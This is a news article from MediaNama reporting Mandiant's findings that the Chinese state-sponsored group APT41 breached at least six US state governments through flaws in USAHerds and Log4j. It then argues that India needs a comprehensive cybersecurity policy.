wordpress blog stats
Connect with us

Hi, what are you looking for?

Chinese state-sponsored cyberattacks on six US states should be a wake-up call for India

The hacking group behind these attacks is known for espionage and financial cybercrimes and has previously targetted India.

A Chinese state-sponsored hacking group referred to as APT41 compromised computer systems in at least six US state governments, cybersecurity firm Mandiant revealed in its report published on March 8. The report does not name the states but said that the hacking was carried out between May 2021 and February 2022 and reveals significant new capabilities of APT41.

These cybersecurity incidents have taken place despite the US government announcing significant measures to overhaul the country’s cybersecurity practices over the last year. This should serve as a wake-up call for Indian policymakers as India still lacks a comprehensive cybersecurity policy and APT41 is a significant threat to government institutions and critical infrastructure in the subcontinent. APT41 is known to have targeted India in the past.

What vulnerabilities led to the cyberattacks?

According to the report, the hackers breached government networks by exploiting vulnerabilities in internet-facing web applications, primarily the following two:

  1. USAHerds livestock health reporting system: USAHerds is a database developed by Acclaim Systems and used by around 18 US states to track the health and density of livestock for improving disease traceability. The software used hard-coded credentials for certain operations, which is against the best practice of using unique key values, the report said. Due to this, hackers could compromise any system on the internet running the software by compromising just one installation. “In most of the web application compromises, APT41 conducted .NET deserialization attacks; however, we have also observed APT41 exploiting SQL injection and directory traversal vulnerabilities,” the report stated.
  2. Java Log4j library: Back in December 2021, a critical and widespread vulnerability in the Java Log4j library called Log4Shell was reported. Since Log4j was used by millions of servers across the world, the vulnerability was ripe for exploitation, which APT41 did within hours of the vulnerability being disclosed, Mandiant said. The group used this to install backdoors into Linux servers of victims, the report said.

“We say ‘at least six states’ because there are likely more states affected, based on our research, analysis, and communications with law enforcement. We know that there are 18 states using USAHerds, so we assess that this is likely a broader campaign than the six states where we have confirmation,” Rufus Brown, a senior threat analyst at Mandiant, told The Verge.

What was the goal of APT41?

“The goals of this campaign are currently unknown, though Mandiant has observed evidence of APT41 exfiltrating Personal Identifiable Information (PII). Although the victimology and targeting of PII data is consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial gain,” the report stated.

Why is APT41 a serious threat?

APT stands for Advanced Persistent Threats and it is used to describe actors that gain unauthorised access and remain undetected for a long time. It is generally used for referring to state-sponsored hacking groups.

Advertisement. Scroll to continue reading.

APT41 is known for carrying out espionage and financial cybercrimes and this dual focus has earned it the nickname Double Dragon. The group has been active since 2012 and five members of its members were put on the FBI’s cyber most wanted list in September 2020.

“APT41 is a prolific Chinese state-sponsored espionage group known to target organisations in both the public and private sectors and also conducts financially motivated activity for personal gain,” Mandiant said in its report before warning that the group is a constantly adapting threat with “new techniques, malware variants, evasion methods, and capabilities.”

“APT41’s recent activity against U.S. state governments consists of significant new capabilities, from new attack vectors to post-compromise tools and techniques. APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability. The group also demonstrates a willingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use. APT41 exploiting Log4J in close proximity to the USAHerds campaign showed the group’s flexibility to continue targeting U.S state governments through both cultivated and co-opted attack vectors. Through all the new, some things remain unchanged: APT41 continues to be undeterred by the U.S. Department of Justice (DOJ) indictment in September 2020.” – Mandiant

What is the US government’s response?

A spokesperson from the US Cybersecurity and Infrastructure Security Agency (CISA) told The Verge that the agency was aware of the threat and that:

“CISA is actively working with our JCDC [Joint Cyber Defense Collaborative] private sector partners, including Mandiant, and government partners to address this advanced persistent threat to state government agencies and assist impacted entities. We encourage all organisations and critical infrastructure entities impacted by cyber intrusions to report to CISA, and to visit CISA.gov to take action to protect themselves.”

While China has not yet commented on the Mandiant report, Liu Pengyu, the spokesman for the Chinese embassy in Washington, told South China Morning Post that China opposes “making groundless accusations against China on cybersecurity and other related issues.”

Also Read:

Have something to add? Post your comment and gift someone a MediaNama subscription.

Advertisement. Scroll to continue reading.
Written By

MediaNama’s mission is to help build a digital ecosystem which is open, fair, global and competitive.



The Delhi High Court should quash the government's order to block Tanul Thakur's website in light of the Shreya Singhal verdict by the Supreme...


Releasing the policy is akin to putting the proverbial 'cart before the horse'.


The industry's growth is being weighed down by taxation and legal uncertainty.


Due to the scale of regulatory and technical challenges, transparency reporting under the IT Rules has gotten off to a rocky start.


Here are possible reasons why Indians are not generating significant IAP revenues despite our download share crossing 30%.

You May Also Like


Google has released a Google Travel Trends Report which states that branded budget hotel search queries grew 179% year over year (YOY) in India, in...


135 job openings in over 60 companies are listed at our free Digital and Mobile Job Board: If you’re looking for a job, or...


Rajesh Kumar* doesn’t have many enemies in life. But, Uber, for which he drives a cab everyday, is starting to look like one, he...


By Aroon Deep and Aditya Chunduru You’re reading it here first: Twitter has complied with government requests to censor 52 tweets that mostly criticised...

MediaNama is the premier source of information and analysis on Technology Policy in India. More about MediaNama, and contact information, here.

© 2008-2021 Mixed Bag Media Pvt. Ltd. Developed By PixelVJ

Subscribe to our daily newsletter
Your email address:*
Please enter all required fields Click to hide
Correct invalid entries Click to hide

© 2008-2021 Mixed Bag Media Pvt. Ltd. Developed By PixelVJ